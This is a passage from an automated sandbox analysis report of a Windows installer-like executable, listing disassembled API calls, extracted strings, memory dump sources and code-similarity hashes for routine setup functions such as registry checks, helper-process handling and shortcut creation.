                                                                                                            • .NET Framework version %s not found, xrefs: 00458D29
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Open
                                                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                            • API String ID: 2976201327-446240816
                                                                                                            • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                                            • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                                                            • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                                                            • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                                                            Strings
                                                                                                            • Helper process exited., xrefs: 004581E5
                                                                                                            • Helper isn't responding; killing it., xrefs: 004581A7
                                                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                                                            • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                            • API String ID: 3355656108-1243109208
                                                                                                            • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                                            • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                                                            • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                                                            • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                                                            APIs
                                                                                                              • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                                                              • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                                                            • , xrefs: 00453ACD
                                                                                                            • RegCreateKeyEx, xrefs: 00453ADF
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                            • API String ID: 2481121983-1280779767
                                                                                                            • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                                            • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                                                            • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                                                            • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                                                              • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                                                            • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                                                            • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                                                              • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                                            • 73A25CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                            • API String ID: 170458502-2312673372
                                                                                                            • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                                            • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                                                            • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                                                            • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                                                            • API String ID: 4190037839-37397897
                                                                                                            • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                                            • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                                                            • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                                                            • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                                                            APIs
                                                                                                            • GetActiveWindow.USER32 ref: 00462124
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                            • API String ID: 2610873146-3407710046
                                                                                                            • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                                            • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                                                            • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                                            • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                                                            APIs
                                                                                                            • GetActiveWindow.USER32 ref: 0042F008
                                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                                            • API String ID: 2610873146-3407710046
                                                                                                            • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                                            • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                                            • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                                            • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                                                            • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance$FreeString
                                                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                                            • API String ID: 308859552-2052886881
                                                                                                            • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                                            • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                                                            • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                                            • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02133858,00000000), ref: 00458399
                                                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                                                            • API String ID: 2182916169-3012584893
                                                                                                            • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                                            • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                                                            • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                                            • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                                                            • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                            • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                            • API String ID: 1914119943-2711329623
                                                                                                            • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                                            • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                                                            • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                                            • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                                                            APIs
                                                                                                            • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                            • SaveDC.GDI32(?), ref: 00416E37
                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                            • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                            • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                            • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                            • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 375863564-0
                                                                                                            • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                                            • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                                            • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                                            • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                            • String ID:
                                                                                                            • API String ID: 1694776339-0
                                                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                                            APIs
                                                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
